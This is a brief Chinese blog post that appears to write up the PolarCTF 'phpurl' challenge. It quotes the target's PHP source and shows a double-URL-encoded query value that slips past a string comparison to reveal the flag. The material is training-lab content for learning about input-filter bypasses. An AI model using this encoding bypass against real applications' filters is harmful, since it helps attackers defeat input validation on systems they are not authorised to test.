phpurl(url编码绕过)

在某次渗透测试中，红队使用网站目录探测工具发现网站源码泄漏，该文件名疑似名被加密：aW5kZXgucGhwcw。 

index.phps

<?php
if("xxs"===$_GET[sys]) {
  echo("<p>Not a good idea!</p>");
  exit();
}

$_GET[sys] = urldecode($_GET[sys]);
if($_GET[sys] == "xxs")
{
  echo "<p>Welcome to polar LABS!</p>";
  echo "<p>Flag: XXXXXXX </p>";
}
?>

what can you find？

思路：
进行2次url编码
http://67d8b910-e53a-46cc-a82b-3d2f97734705.www.polarctf.com:8090/index.php?sys=%2578%2578%2573

posted @ 2025-05-08 10:50 lethe311 阅读(11) 评论(0) 收藏举报

刷新页面返回顶部

lethe311

phpurl(url编码绕过)

公告